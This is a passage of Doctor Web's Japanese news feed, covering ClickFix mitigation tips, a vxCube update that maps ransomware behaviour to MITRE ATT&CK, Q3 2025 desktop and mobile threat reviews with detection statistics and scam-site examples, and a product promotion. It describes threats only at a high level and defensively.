そのうえ、悪意のあるコードは暗号化または難読化されている場合もあり、これが従来のセキュリティルーチンによる検出を、輪をかけて困難なものにしています。

できるだけ早い段階で対処することの重要性

ClickFixによるインシデントでは、攻撃者によるシステムへのリモート接続を阻止することが、実際の脅威に対応することと同じくらい重要です。そのために導入できる追加のセキュリティ対策は以下を参照してください。

ブラウザ上にコマンド（PowerShellスクリプトなど）を含んだ不審なメッセージが表示された場合はクリップボードの内容を確認する
ネットワークトラフィック、ならびにリモート接続を確立しようとする疑わしい試みを分析する
実際の攻撃シナリオを検証することで、ソーシャルエンジニアリングの手口を見破る方法についてユーザーに学んでもらう

標的型攻撃に関する構造化データ: Dr.Web vxCube レポートがMITRE ATT&CK® マトリックスと統合

Thu, 23 Oct 2025 10:02:42 GMT

Doctor WebはDr.Web vxCubeのアップデートをリリースしました。今回の主な変更点は、Dr.Web vxCubeで生成されるレポートがMITRE ATT&CK® Enterprise Matrixにオーバーレイできるようになったことです。これにより、解析対象となる検体の悪意性をより正確に特定し、攻撃のタイムラインを再現することが可能となりました。MITRE ATT&CK® マトリックスは、サイバー攻撃者が情報システムに対して使用する**戦術（Tactics）および手法（Techniques）**を体系的に記述したナレッジベースです。情報セキュリティ専門家はこの情報を活用することで、インフラ防御の効率をさらに高めることができます。

新機能の概要

今回のアップデートにより、専門家は潜在的に悪意のあるオブジェクトのテクニカルレポートを閲覧できるほか、そのオブジェクトがどのように侵入し感染したのかという一連のイベントを明確に特定できるようになりました。この情報は、防御対策の強化やセキュリティポリシー改善点の把握に役立ちます。また、検出された手法や戦術をもとに、SOC（セキュリティ運用センター）やSIEMシステムの検知ルールをカスタマイズすることも可能です。

分析例：既知の暗号化ランサムウェアの解析結果

戦術: Initial Access（初期アクセス）
手法: Replication Through Removable Media（リムーバブルメディアを介した複製）
感染源は、攻撃者がマルウェアを配置したリムーバブルドライブでした。従業員が感染した個人用USBメモリを使用した可能性があります。
戦術: Execution（実行）
手法: Windows Management Instrumentation (WMI)
USBドライブが接続されると、自動実行メカニズム（例：autorun.inf経由）が作動します。ランサムウェアは正規の管理ツールであるWMIを悪用し、主要なワークロードを実行します。その結果、単純なアンチウイルスでは検出を回避できます。
戦術: Persistence & Privilege Escalation（永続化と権限昇格）
手法: Boot or Logon Autostart Execution（Registry Run Keys / Startup Folder）
再起動後も活動を継続するために、ランサムウェアはスタートアップフォルダに自身を登録します。レジストリエントリを作成またはスタートアップフォルダに自身をコピーし、ユーザー権限で自動的に実行されるようにします。
戦術: Defense Evasion（防御回避）
手法: Indicator Removal: File Deletion（インジケーター削除：ファイル削除）
システム侵入後、ランサムウェアは痕跡を隠蔽するため、フラッシュドライブや一時フォルダから元の実行ファイルを削除します。これにより、解析や検出を困難にします。
戦術: Lateral Movement（ネットワーク内の横移動）
手法: Replication Through Removable Media
マルウェアは他の端末にも感染を広げます。新たなUSBデバイスが接続されると感染させ、別のコンピュータに挿入された際に攻撃を繰り返します。この手法により、ネットワーク分離（air-gap）を越えて感染を拡大します。
戦術: Impact（影響）
手法: Inhibit System Recovery / Data Encrypted for Impact
Inhibit System Recovery: 標準のWindowsツールでの復元を妨げるため、Volume Shadow Copy Service（VSS）を破壊または暗号化します。
Data Encrypted for Impact: コンピュータ上の重要なファイル（ドキュメント、写真、データベースなど）を強力な暗号化アルゴリズムで暗号化し、復号キーの提供と引き換えに身代金を要求します。

専門家が講じるべき対策

専門家が講じるべき対策
USBデバイス使用に関するポリシーの強化（オートランの禁止、暗号化された業務用フラッシュドライブのみ使用可）
Registry Run Keysの疑わしいエントリや、WMIによる悪意のあるスクリプト実行を検出するよう監視システムを構成する
脅威拡散を防止する目的でネットワークのセグメンテーションを行う
復元のためにデータの定期的かつ安全なバックアップを確保する

利用可能環境と提供形態

新バージョンは、クラウド版およびオンプレミス（on-premise）版の両方で利用可能です。
解析対象はWindowsおよびLinux環境で、現時点では英語のみで提供されています。
また、Android OS向け解析機能の追加も予定されています。

さらに、Dr.Web vxCubeマニュアルも一新されました。
新バージョンのリリースに伴い、クラウド版は**10月23日 13:00～14:00（モスクワ時間）**の間、一時的にご利用いただけませ。

ローカル版を更新する場合は、最新のDr.Web vxCubeディストリビューションと仮想マシンイメージをダウンロードし、マニュアルに従って再インストールしてください。ダウンロードはダウンロードウィザードから行えます。

Dr.Web vxCube について

Dr.Web vxCubeは、独立した仮想環境で不審なオブジェクトを解析するツールです。
セキュリティ侵害インジケーター（IoC）を特定し、標的型攻撃（APT）を含む高度な攻撃を阻止します。
クラウド版とオンプレミス版の2形態で提供されています。
クラウド版のトライアルは、専用ウェブフォームよりお申し込みください。
Dr.Web vxCubeは、Doctor Webの販売パートナーからもご購入いただけます。

著作権およびライセンス

今回のアップデートには、MITRE ATT&CK®ナレッジベースが含まれており、このナレッジベースの使用はThe MITRE Corporationよりライセンスされています。

© 2025 The MITRE Corporation.
This work is reproduced and distributed with the permission of The MITRE Corporation.
MITRE ATT&CK® の使用許諾は以下をご参照ください：
https://attack.mitre.org/resources/legal-and-branding/terms-of-use/

Dr.Web vxCube ライセンス使用許諾の更新

Fri, 17 Oct 2025 07:49:35 GMT

Dr.Web vxCube “サンドボックス”は、疑わしいファイルをスキャンし、隔離された仮想環境においてその挙動を再現することで、コンピュータシステムへの感染を特定し、標的型攻撃（APT）を含む各種攻撃を迅速に防御することを可能といたします。
Dr.Web vxCubeをご利用いただくことで、WindowsおよびLinux環境におけるオブジェクト解析に加え、Android対応アプリケーションのAPK形式やDockerコンテナの解析も実施いただけます。
不審ファイル解析ツール（“サンドボックス”）であるDr.Web vxCubeには、クラウド版とオンプレミス版（on-premise）の2種類をご用意しております。さらに、本製品には、悪意あるファイルの修復を目的としたDr.Web CureIt! の特別ビルドを追加することが可能です。
更新されたライセンス使用許諾の詳細につきましては、以下のページをご参照ください：https://license.drweb.com/agreement/。
本製品はDoctor Webパートナーよりご購入いただけます。

2025年第3四半期のウイルスレビュー

Wed, 01 Oct 2025 02:00:00 GMT

2025年10月1日

Dr.Webアンチウイルスの検出統計によると、2025年第3四半期に検出された脅威の合計数は2025年第2四半期と比較して4.23%減少し、一方でユニークな脅威の数は2.17%増加しました。最も多く検出された脅威は、望ましくないアドウェアアプリ、広告を表示させるトロイの木馬、悪意のあるスクリプトとなっています。メールトラフィック内では、悪意のあるスクリプト、バックドア、そしてダウンローダやドロッパー、パスワードスティーラーなど種々のトロイの木馬が最も多く検出されました。

最も多く検出された暗号化ランサムウェアは Trojan.Encoder.35534、Trojan.Encoder.35209、Trojan.Encoder.35067 となっています。

2025年7月、Doctor Webのエキスパートは仮想通貨とパスワードを盗むよう設計されたマルウェアファミリー Trojan.Scavenger について記事を公開しました。Trojan.Scavenger はゲームのmodやチート、パッチに偽装して拡散され、DLL検索順序ハイジャッキング脆弱性を悪用して正規アプリと同時に起動されます。

8月には、ロシア企業の従業員を標的とした、モバイルデバイス向け多機能バックドア Android.Backdoor.916.origin の拡散について注意を喚起しました。このマルウェアはサイバー犯罪者によって遠隔操作され、被害者をスパイし機密情報を窃取する目的で使用されていました。

同じく8月、Doctor WebのアンチウイルスラボはハッカーグループScaly Wolfによるロシアの機械工学系企業を狙った標的型攻撃に関する調査結果を公表しました。この攻撃では複数の悪意のあるツールが用いられていましたが、メインとなるツールの1つはモジュール型バックドアUpdatarでした。攻撃者はこのバックドアを使用して、感染したコンピューターから機密情報を盗み出そうとしていました。

2025年第3四半期には、Doctor Webのインターネットアナリストによって新たなTelegramメッセンジャーの偽サイトや金融関連の詐欺サイトが多数確認されました。Google Playでは、第3四半期を通して数十もの悪意のあるアプリや望ましくないアプリが発見されています。その中にはユーザーを有料サービスに登録するトロイの木馬 Android.Joker や悪意のある偽アプリ Android.FakeApp が含まれていました。

2025年第3四半期の主な傾向

検出された脅威の合計数が減少
攻撃に使用されるユニークな脅威の数が増加
Telegramメッセンジャーの偽サイトや金融関連の詐欺サイトに新たなものが出現
パスワードと仮想通貨を盗むマルウェア Trojan.Scavenger が拡散される
バックドア Android.Backdoor.916.origin を用いてロシア企業の従業員をスパイし機密情報を窃取する攻撃が確認される
アドウェア型トロイの木馬 Android.MobiDash が最も多く検出されたAndroid向け脅威となる
アドウェア型トロイの木馬 Android.HiddenAds の活動が2四半期連続で減少
Google Playで多数の脅威を検出

Doctor Webサーバーによる統計

2025年第3四半期に最も多く検出された脅威：

VBS.KeySender.7: mode extensions、разработчика、розробникаというテキストを含むウィンドウを無限ループで検索し、Escapeキー押下イベントを送信してそれらを強制的に閉じる悪意のあるスクリプトです。
Adware.Downware.20091: 海賊版ソフトウェアのインストーラとして拡散されていることの多いアドウェアです。
Trojan.Siggen31.34463: 感染したシステムにさまざまなマイニング型トロイの木馬やアドウェアをダウンロードするよう設計された、Go言語で記述されたトロイの木馬です。このマルウェアは %appdata%\utorrent\lib.dllに置かれるDLLファイルで、Torrentクライアント「uTorrent」のDLL検索順序ハイジャッキング（DLL Search Order Hijacking）脆弱性を悪用することで起動します。
Adware.Ubar.20: ユーザーのデバイス上に望ましくないプログラムをインストールするよう設計されたTorrentクライアントです。
JS.Siggen5.44590: パブリックJavaScriptライブラリes5-ext-mainに追加される悪意のあるコードです。タイムゾーン設定がロシア国内のものになっているサーバーにパッケージがインストールされた場合に、特定のメッセージを表示します。

メールトラフィック内で検出された脅威の統計

W97M.DownLoader.2938: Microsoft Officeドキュメントの脆弱性を悪用するダウンローダ型トロイの木馬のファミリーです。感染させたコンピューターに別の悪意のあるプログラムをダウンロードすることもできます。
Exploit.CVE-2017-11882.123
Exploit.CVE-2018-0798.4: Microsoft Officeソフトウェアの脆弱性を悪用し、攻撃者が任意のコードを実行できるようにするエクスプロイトです。
JS.Phishing.745: フィッシングページを生成する悪意のあるJavaScriptスクリプトです。
JS.Muldrop.371: システムにペイロードをインストールする悪意のあるJavaScriptスクリプトです。

暗号化ランサムウェア

2025年第3四半期にDoctor Webテクニカルサポートサービスに寄せられた、ランサムウェアによって暗号化されたファイルの復号化リクエスト数は、2025年第2四半期と比較して3.02%増加しました。

Doctor Webのテクニカルサポートサービスに寄せられた復号化リクエスト数の推移：

2025年第3四半期に最も多く確認された暗号化ランサムウェア（ユーザーからのリクエストに占める割合）：

Trojan.Encoder.35534 — 26.99%
Trojan.Encoder.35209 — 3.07%
Trojan.Encoder.35067 — 2.76%
Trojan.Encoder.41542 — 2.15%
Trojan.Encoder.29750 — 1.84%

インターネット詐欺

2025年第3四半期、Doctor WebのインターネットアナリストはTelegramメッセンジャーの新たな偽サイトが出現していることを確認しました。それら偽サイトの一部はユーザーのアカウントにアクセスすることを目的としたものでした。

金融関連の詐欺サイトも依然として後を絶ちません。そのうちの1つはApple社が開発したとする「未来の投資プラットフォーム『Apple Trade AI』」でユーザーをおびき寄せています。月に4,000ドル以上稼ぐことができると主張していますが、このプラットフォームに「アクセス」するためにユーザーは個人情報を提供して登録するよう要求されます。

また別の詐欺サイトでは「Metaの新しい投資プラットフォーム」に参加して「月4000ドル以上の安定した収入を得る」ようユーザーに持ちかけています。この「プラットフォーム」にアクセスするために、ユーザーはアンケートに回答して登録するよう求められます。

WhatsAppのトレーディング（取引）ボットを使用してお金を稼ぐことができるとうたう偽の投資プラットフォームにも新たなものが登場しています。

このサービスを使用するために、ユーザーは個人情報を提供する必要があります。

特定の国のユーザーを標的にした詐欺サイトも確認されています。そのうちのいくつかはCIS諸国のユーザーを標的にしたもので、「閉ざされた投資市場を開く」チャンスを提供し、金融サービスINSIDER Xを通じて特別な限定投資商品へのアクセスを可能にすると主張しています。このサービスを利用するために、ユーザーは個人情報を提供して「リクエストを送信」するよう指示されます。

ロシアのユーザーを狙った詐欺サイトの1つは、大手石油・ガス会社やロシア政府ポータルサイト「Gosuslugi」と関連があるかのように見せかけた「投資プラットフォーム」にアクセスするためにアンケートに回答するよう誘っています。

また別の詐欺サイトはロシアの正規銀行サービスを装い、「週に5万ルーブル以上稼ぐ」ために登録するようユーザーに持ちかけていました。

同様の偽サイトは他の国でも確認されています。キルギスタンのユーザーは、人気のプログラムに参加して、国内最大であると称する企業に投資するよう勧めるサイトの標的となりました。

ジョージアの銀行を装った詐欺サイトでは、その「投資プラットフォーム」に参加できるとうたってユーザーをおびき寄せていました。

カザフスタンの銀行を模倣した同様の偽サイトでは、月6万テンゲ以上を稼ぐことができると約束しています。

トルコの石油・ガス会社を装ったサイトでは、投資プラットフォームに参加して「1日に最大9000トルコリラ」稼ぐことができると主張しています。

政府からの給付金や補助金などといったトピックを悪用した詐欺も引き続き横行しています。カザフスタンのユーザーを標的としたそのようなサイトの1つでは、ユーザーは自分が補助金の対象かどうかを確認し、最大で500万テンゲを受け取ることができるとしています。

Find out more about Dr.Web non-recommended sites

モバイルデバイスを脅かす悪意のあるプログラムや望ましくないプログラム

Dr.Web Security Space for mobile devices（モバイルデバイス向けDr.Web Security Space）によって収集された検出統計によると、2025年第3四半期に最も多く検出された脅威は広告を表示させるトロイの木馬 Android.MobiDash となりました。前四半期に首位を飾っていた Android.HiddenAds は2位に転落し、その活動は大幅に減少しました。3番目に多く検出された脅威は偽アプリ Android.FakeApp となっています。

バンキング型トロイの木馬 Android.BankBot の検出数は前四半期比で増加し、一方で Android.Banker と Android.SpyMax の検出数は減少しました。

8月、Doctor Webはロシア企業の従業員をスパイして機密情報を窃取する目的で使用されていた多機能バックドア Android.Backdoor.916.origin について記事を公開しました。

Google Playでは第3四半期を通して70を超える悪意のあるアプリや望ましくないアプリが発見されています。それらの中にはユーザーを有料サービスに登録するトロイの木馬 Android.Joker や偽アプリ Android.FakeApp、そして仮想報酬を現金化できるとうたうアプリ Program.FakeMoney.16 が含まれていました。

2025年第3四半期のモバイルマルウェアに関連した注目すべきイベント：

アドウェア型トロイの木馬 Android.MobiDash の活動が活発化
アドウェア型トロイの木馬 Android.HiddenAds の活動が減少
バンキング型トロイの木馬 Android.BankBot の検出数が増加
バンキング型トロイの木馬 Android.Banker と Android.SpyMax による攻撃件数が減少
多機能バックドア Android.Backdoor.916.origin を用いてロシア企業の従業員をスパイする攻撃が確認される
Google Playから多数の脅威が拡散される

2025 年第3四半期のモバイルデバイスを取り巻くセキュリティ脅威の状況についての詳細はこちらのレビューをご覧ください。

2025年第3四半期のモバイルマルウェアレビュー

Wed, 01 Oct 2025 00:00:00 GMT

2025年10月1日

Dr.Web Security Space for mobile devices（モバイルデバイス向けDr.Web Security Space）によって収集された検出統計によると、2025年第3四半期に最も多く検出された脅威は広告を表示させるトロイの木馬 Android.MobiDash となりました。その検出数は前四半期比で18.19%増加しています。

2番目に多く検出されたのは、2四半期連続で活動の減少が続いているアドウェア型トロイの木馬 Android.HiddenAds でした。第3四半期の検出数は71.85%の減少となっています。このトロイの木馬は検出と削除を困難にするために自身のアイコンを隠し、広告を表示させます。表示される広告の種類には全画面モードでの動画も含まれています。

サイバー犯罪者によってさまざまな詐欺スキームに用いられるトロイの木馬 Android.FakeApp が前四半期に引き続き3位となりました。その検出数は7.49%減少しています。多くの場合、これら悪意のあるアプリはうたわれた機能を実行する代わりに詐欺サイトや悪意のあるサイト、ブックメーカーやオンラインカジノのサイトなどさまざまなWebサイトを開きます。

バンキング型トロイの木馬では、その活動に38.88%の減少がみられたものの依然として Android.Banker トロイの木馬が最も多く検出されています。Android.Banker は銀行口座に不正アクセスして金銭を盗み取る目的で脅威アクターによって使用されています。このファミリーに属するトロイの木馬はフィッシング画面を表示させてログインIDとパスワードを窃取する、正規銀行アプリの外観を模倣する、SMSを傍受してワンタイムコードを盗むなどといった機能を備えています。

続いて、前四半期比18.91%増となった Android.BankBot トロイの木馬が2位につけました。このトロイの木馬も認証コードを傍受することでユーザーのインターネットバンキングアカウントにアクセスしようとします。そのほか、サイバー犯罪者から受け取るさまざまなコマンドを実行することもでき、それらの中には感染したデバイスの遠隔操作を可能にするものもあります。

3位となったのは Android.SpyMax トロイの木馬で、その検出数は前四半期比で17.25%減少しています。Android.SpyMax はスパイウェア型トロイの木馬SpyNoteのソースコードを基に作成されており、感染したデバイスの遠隔操作を含む広範な機能を備えています。

8月、Doctor Webは多機能バックドア Android.Backdoor.916.origin を拡散する攻撃キャンペーンについて記事を公表しました。このマルウェアはAndroidユーザーをスパイし、機密情報を窃取する目的で使用されていました。脅威アクターはメッセンジャーを利用して被害者にメッセージを送信し、添付のAPKファイルから「アンチウイルス」（に偽装したバックドア）をインストールするよう誘導しています。Doctor Webのアンチウイルスラボではこのバックドアの最初の亜種を2025年1月に発見し、それ以来その進化を追い続けてきました。Android.Backdoor.916.origin はAndroidユーザー間での大量拡散を狙ったものではなく、標的型攻撃を目的に設計されたものであると考えられます。その主たる標的はロシア企業の従業員です。

Google Playでは第3四半期を通して多くの悪意のあるプログラムが拡散され、それらは合計で145万9000件以上インストールされていました。その中にはユーザーを有料サービスに登録する数十もの Android.Joker トロイの木馬や悪意のある偽アプリ Android.FakeApp が含まれています。そのほか、仮想報酬を現金化できるとうたうアプリの新たなものも発見されました。

2025年第3四半期の主な傾向

アドウェア型トロイの木馬 Android.MobiDash が最も多く検出された脅威となる
アドウェア型トロイの木馬 Android.HiddenAds の活動が引き続き減少
バンキング型トロイの木馬 Android.BankBot による攻撃件数が増加
バンキング型トロイの木馬 Android.Banker と Android.SpyMax の活動が減少
多機能バックドア Android.Backdoor.916.origin を用いた、ロシア企業の従業員に対する攻撃が確認される
Google Playで悪意のあるアプリを多数発見

Dr.Web Security Space for mobile devicesによる統計

Android.MobiDash.7859: 迷惑な広告を表示させるトロイの木馬です。開発者によってアプリケーション内に埋め込まれる特殊なソフトウェアモジュールです。
Android.FakeApp.1600: 設定にハードコードされたWebサイトを開くトロイの木馬アプリです。既知の亜種ではオンラインカジノのサイトが開かれます。
Android.Click.1812: さまざまなWebサイトをバックグラウンドで密かに読み込むことができる、悪意のあるWhatsAppメッセンジャーMod（改造版）の検出名です。
Android.HiddenAds.673.origin: 迷惑な広告を表示するよう設計されたトロイの木馬です。無害でポピュラーなアプリを装って拡散されることが多く、別のマルウェアによってシステムディレクトリ内にインストールされる場合もあります。通常、これらのトロイの木馬はAndroidデバイス上に侵入すると自身の存在をユーザーから隠そうとします（ホーム画面からアイコンを「隠す」など）。
Android.Triada.5847: Android.Triada トロイの木馬を検出や解析から保護するよう設計されたパッカーの検出名です。多くの場合、これらトロイの木馬が埋め込まれた悪意のあるTelegramメッセンジャーMod（改造版）と一緒に用いられます。

Program.FakeMoney.11: さまざまなタスクを完了することでお金を稼ぐことができるとうたうAndroidアプリケーションの検出名です。このアプリはタスクが完了するたびに報酬が貯まっていくかのように見せかけます。「稼いだ」お金を引き出すために（多くの場合、一般的に広く使用されている支払いシステムや銀行を指定されます）、ユーザーは一定の金額を貯める必要があるとされていますが、たとえその金額が貯まったとしても実際にお金を手にすることはできません。このウイルスレコードは、そのようなアプリのソースコードを基に作成された他の望ましくないソフトウェアの検出にも使用されます。
Program.CloudInject.5
Program.CloudInject.1: クラウドサービスCloudInjectと、同名のAndroidユーティリティ（Tool.CloudInjectとしてDr.Webウイルスデータベースに追加されています）を使用して改造されたAndroidアプリケーションの検出名です。アプリケーションはリモートサーバー上で改造されますが、その際、改造を行うユーザーはアプリに何が追加されるのか具体的な改造内容をコントロールすることができません。また、これらのアプリケーションは危険なシステム権限を複数要求します。改造後、ユーザーはこれらアプリをリモートで管理できるようになります（アプリをブロックする、カスタムダイアログを表示する、他のソフトウェアのインストールや削除を追跡するなど）。
Program.FakeAntiVirus.1: アンチウイルスソフトウェアを模倣するアドウェアアプリケーションの検出名です。これらのアプリは存在しない脅威について偽の通知をすることでユーザーを騙し、ソフトウェアの完全版を購入するよう要求します。
Program.TrackView.1.origin: Androidデバイスを通じてユーザーを監視できるようにするアプリケーションの検出名です。このアプリを使用することで、悪意のあるアクターがデバイスの位置を追跡したり、カメラで動画や写真を撮ったり、マイクで周囲の音を聞いたり、音声を録音したりすることが可能になります。

Tool.NPMod.3
Tool.NPMod.1
Tool.NPMod.4: NP Managerユーティリティを使用して改造されたAndroidアプリケーションの検出名です。そのようなアプリには特殊なモジュールが組み込まれており、改造後にデジタル署名の検証をバイパスすることができます。
Tool.LuckyPatcher.2.origin: Androidデバイスにインストールされたアプリを改変できるようにする（パッチを作成する）ツールです。アプリの動作ロジックを変更したり特定の制限を回避したりする目的で使用されます。たとえば、ユーザーはこのツールを使用することで、バンキングアプリのルートアクセス検証を無効にしたり、ゲーム内で無限のリソースを取得したりできます。パッチを追加するために、このユーティリティは特別に作成されたスクリプトをインターネットからダウンロードしますが、このスクリプトは誰でも作成して共通のデータベースに追加することができます。そのようなスクリプトの機能が悪意のあるものである場合もあることから、このツールを使用して作成されたパッチは潜在的な脅威となる可能性があります。
Tool.Androlua.1.origin: スクリプト言語Luaを使用してAndroidアプリを開発するための特別なフレームワークの、潜在的に危険なバージョンの検出名です。Luaベースアプリの主なロジックは、実行時に対応するスクリプトがインタプリタによって暗号化・復号化されるというものです。多くの場合、このフレームワークは動作するためにデフォルトで多数のシステム権限へのアクセスを要求します。その結果、フレームワークが実行するLuaスクリプトによって、取得した権限に応じたさまざまな悪意のある動作が実行される可能性があります。

Adware.AdPush.3.origin
Adware.Adpush.21846: Androidアプリに組み込まれるアドウェアモジュールのファミリーです。ユーザーを騙すような紛らわしい、広告を含んだ通知（オペレーティングシステムからの通知に似せたものなど）を表示させます。また、さまざまな機密情報を収集し、別のアプリをダウンロードしてインストールを開始することができます。
Adware.ModAd.1: その機能に特定のコードが挿入されている、WhatsAppメッセンジャーのMod（改造版）です。このコードはメッセンジャーの動作中にWebコンテンツを表示（Android WebViewコンポーネントを使用して）させることで目的のURLをロードします。これらのURLから、オンラインカジノやブックメーカー、アダルトサイトなどの広告サイトへのリダイレクトが実行されます。
Adware.Youmi.4: Androidデバイスのホーム画面に広告ショートカットを追加する、望ましくないアドウェアモジュールの検出名です。
Adware.Basement.1: 迷惑な広告を表示するアプリです。多くの場合、それらの広告は悪意のあるサイトや詐欺サイトにつながっています。このアプリには望ましくないアプリ Program.FakeMoney.11 と同じコードベースが使用されています。

Google Play上の脅威

2025年第3四半期、Doctor Webのアンチウイルスラボは50を超える Android.Joker トロイの木馬を検出しました。これはユーザーを有料サービスに登録するトロイの木馬ファミリーです。新たに発見された亜種はメッセンジャーや各種システムツール、画像編集アプリ、カメラアプリ、ドキュメント管理アプリなどのさまざまなアプリを装って拡散されていました。

Android.Joker.2412 が潜んだシステム最適化アプリ「Clean Boost」と、Android.Joker.2422 が隠されていたPDFドキュメント作成アプリ「Convert Text to PDF」

詐欺スキームに用いられる Android.FakeApp ファミリーに属する偽アプリも引き続き発見されています。これまで同様、その一部は参考書や教材、投資サービスにアクセスするためのソフトウェアなどといった金融関連アプリに偽装していました。また別の一部はゲームを装って拡散されています。このタイプの Android.FakeApp は特定の条件下でゲームとして機能する代わりにオンラインカジノやブックメーカーのサイトを開く場合があります。

金融アプリを装った Android.FakeApp トロイの木馬の例：金融リテラシーをテストするアプリに偽装した Android.FakeApp.1889 と、金融知識を向上させるアプリに偽装した Android.FakeApp.1890

そのほか、望ましくないアプリ Program.FakeMoney.16 も発見されました。Program.FakeMoney.16 は「Zeus Jackpot Mania」というアプリを装って拡散されており、このアプリでユーザーは仮想報酬を獲得し、現金化して引き出すことができるとうたっています。

Google Playで発見された Program.FakeMoney.16

現金を「引き出す」ためにユーザーはいくつか情報を提供するよう要求されます。最終的に被害者がお金を受け取ることはありません。

ユーザーに氏名と銀行口座情報を提供するよう求める Program.FakeMoney.16

Indicators of compromise(侵害の痕跡)※英語

デジタル時代に感謝を伝えましょう ― 「敬老の日」を記念してDr.Web Family Securityを50%割引でご提供します

Mon, 15 Sep 2025 10:28:38 GMT

2025年9月15日

日本の祝日「敬老の日」（Respect for the Aged Day）を記念して、ご高齢の方々へ感謝の気持ちをお伝えするため、特別キャンペーンを実施いたします。

現代、お年寄りの方は、スマートフォン、パソコン、メッセンジャー経由でのコミュニケーションを活用しつつあります。しかし、インターネットを利用すると同時に、さまざまな脅威（詐欺サイトやフィッシングメールなど）に遭遇するリスクも発生します。こうしたリスクから大切な人を守ることが大切です。

アプリケーションDr.Web Family Security 5+1を購入時に50%割引をご利用いただけます。本アプリケーションの活用により、ご家族の皆様のために安全なデジタル環境を実現できます。

割引をご利用いただく方法

Doctor Webオンラインストアにお進みください。

Dr.Web Family Security 5+1製品をショッピングカートに入れてください。

プロモ用コード「Respect」をフィールドに入力します。

50%割引が自動的に適用されます。

本キャンペーン実施期間: 2025年9月15日～2025年9月21日

デジタル体験がポジティブなものになるように、ご両親や祖父母に、気遣いだけでなく、安全なインターネットサーフィンの実現を是非ご検討ください。

全てのニュース

新学期に向けて「Dr.Web Security Space」を20%OFFで提供

PC向けセキュリティ製品「Dr.Web Security Space」、SKD AWARDSを受賞

2025年のモバイルマルウェアレビュー

概要

2025年の主な傾向

2025年の最も注目すべきイベント

統計

Google Play上の脅威

バンキング型トロイの木馬

今後の動向と展望

2025年のウイルスレビュー

2025年の主な傾向

2025年の最も注目すべきイベント

マルウェアに関する状況

暗号化ランサムウェア

インターネット詐欺

モバイルデバイス

今後の動向と展望

Dr.Web FixIt! ライセンス使用許諾の更新

2025年第4四半期のモバイルマルウェアレビュー

2025年第4四半期の主な傾向

Dr.Web Security Space for mobile devicesによる統計

Google Play上の脅威

2025年第4四半期のウイルスレビュー

2025年第4四半期の主な傾向

Doctor Webサーバーによる統計

メールトラフィック内で検出された脅威の統計

暗号化ランサムウェア

インターネット詐欺

モバイルデバイスを脅かす悪意のあるプログラムや望ましくないプログラム

年末年始休業のお知らせ

キメラ退治の英雄ベレロフォンも驚愕：巧みに人間になりすましサイトの人気度を高めるトロイの木馬ChimeraWire

序論

1つ目の感染チェーン

2つ目の感染チェーン

Trojan.ChimeraWire

ユーザーのマウスクリックを模倣

結論

MITRE ATT&CK®

日本での15周年を記念して Dr.Web の総合セキュリティを 50%オフ で提供する特別キャンペーンを実施！

Dr.Web CureIt!、マルウェアの隠蔽動作を解析して検出可能に

■ 今後の予定：Linux 向けプロフェッショナル緊急対応サービス

ハッカー集団「Cavalry Werewolf」がロシア政府機関を攻撃

序論

攻撃および使用されたツールに関する全般的情報

Cavalry Werewolfのツール

エントリーポイント（侵入口）

次の感染段階

侵害されたネットワーク内でCavalry Werewolfが実行する典型的なアクション

ハッカー集団Cavalry Werewolfの特徴

MITREマトリックス

モバイルデバイス向けのDr.Webアップデート、インテリジェント保護システムを新たに実装

アップデートの特徴

利用のメリット

運用の利便性向上

Dr.Web Enterprise Security Suite / Dr.Web Industrialの集中管理サーバーのアップデート

急増する「ClickFix攻撃」とは

以下にClickFix攻撃の流れを簡潔に再現します。

ClickFix攻撃の検出が難しい理由

できるだけ早い段階で対処することの重要性

標的型攻撃に関する構造化データ: Dr.Web vxCube レポートがMITRE ATT&CK® マトリックスと統合

Dr.Web vxCube ライセンス使用許諾の更新

2025年第3四半期のウイルスレビュー

2025年第3四半期の主な傾向

Doctor Webサーバーによる統計

メールトラフィック内で検出された脅威の統計

暗号化ランサムウェア

インターネット詐欺

モバイルデバイスを脅かす悪意のあるプログラムや望ましくないプログラム

2025年第3四半期のモバイルマルウェアレビュー

2025年第3四半期の主な傾向

Dr.Web Security Space for mobile devicesによる統計

Google Play上の脅威

デジタル時代に感謝を伝えましょう ― 「敬老の日」を記念してDr.Web Family Securityを50%割引でご提供します

日本での15周年を記念して Dr.Web の総合セキュリティを 50%オフで提供する特別キャンペーンを実施！